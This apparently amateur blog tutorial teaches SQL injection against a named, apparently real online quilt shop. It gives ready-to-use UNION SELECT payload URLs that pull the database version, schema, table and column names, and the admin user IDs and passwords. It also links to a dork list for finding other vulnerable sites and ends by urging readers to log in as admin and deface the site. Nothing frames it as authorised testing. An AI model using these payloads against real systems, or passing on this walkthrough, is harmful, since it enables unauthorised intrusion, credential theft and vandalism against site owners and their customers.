SQL detailed with vulnerable site address to test...complete tutorial written by me...
Introduction :
Introduction :
What Is SQLi? ( SQL injection )
SQL injection is a basic in Webhacking , and its the first way to debute Exploiting sites .
How To Find SQLi Vuln Sites , & Inject Them :
This is very simple , just use this dorks with a SQLi Scanner , Or google then check every site by your self.
Download dorks list from here : http://hotfile.com/dl/134401276/49fa4f5/dork.txt.html
now lets start...
http://www.quiltchalet.com/prod_detail.php?ID=117
this is the vulnerable link...
to test a sql vulnerability we have to add a ' either in front or back of the number/string which follows the .php?ID=...for eg: http://www.quiltchalet.com/prod_detail.php?ID=117' or http://www.quiltchalet.com/prod_detail.php?ID='117
here we will now get a error - Cannot execute SQL... the error message may vary due to many reasons...
now we have to find the number of tables in the database using order by statement...
http://www.quiltchalet.com/prod_detail.php?ID=117 order by 13--
here i chose 13 because i found out 13 was the last successful number which can return a error free page.. that means if you enter 14, it will return an error.. so in short you will have to check each number...
now we have to find the vulnerable table number.. for that we use the following command..
http://www.quiltchalet.com/prod_detail.php?ID=-117 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13--
now we can see some random numbers on the screen.. here we find 6,7..
since 6 is somewhat in bold we will choose it...
now we have to find the version of the database..for that
http://www.quiltchalet.com/prod_detail.php?ID=-117 union all select 1,2,3,4,5,@@version,7,8,9,10,11,12,13--
here we get the database version 5.0.67-community
now we have to find the database name.. for that
http://www.quiltchalet.com/prod_detail.php?ID=-117 union all select 1,2,3,4,5,group_concat(schema_name),7,8,9,10,11,12,13 from information_schema.schemata--
quilt_chalet- this is the db name..
now to find table names..
http://www.quiltchalet.com/prod_detail.php?ID=-117 union all select 1,2,3,4,5,group_concat(table_name),7,8,9,10,11,12,13 from information_schema.tables where table_schema=database()--
now we will get some table names but our interest is on the table named admin..
now to find column names we have
http://www.quiltchalet.com/prod_detail.php?ID=-117 union all select 1,2,3,4,5,group_concat(column_name),7,8,9,10,11,12,13 from information_schema.columns where table_schema=database()--
you will now see some column names.. now we want to get columns inside admin table, for that
http://www.quiltchalet.com/prod_detail.php?ID=-117 union all select 1,2,3,4,5,group_concat(column_name),7,8,9,10,11,12,13 from information_schema.columns where table_name=0x61646d696e
here note that 61646d696e is the hex equivlent of string 'admin' and we add a 0x infront of it for the server to understand it is a hex value..
string to hex conversion can be done in sites like http://www.swingnote.com
now we have to pull out the things we want from admin table..for that
http://www.quiltchalet.com/prod_detail.php?ID=-117 union all select 1,2,3,4,5,group_concat(userid,0x3a,userpsswd),7,8,9,10,11,12,13 from quilt_chalet.admin--
now we get userid and userpasswrd in the format userid:userpsswd
here 0x3a is the ascii equivalent of : symbol..
now thats it.. basic sqli is over..
now find the admin page of that website and deface it...;)
0 comments:
Post a Comment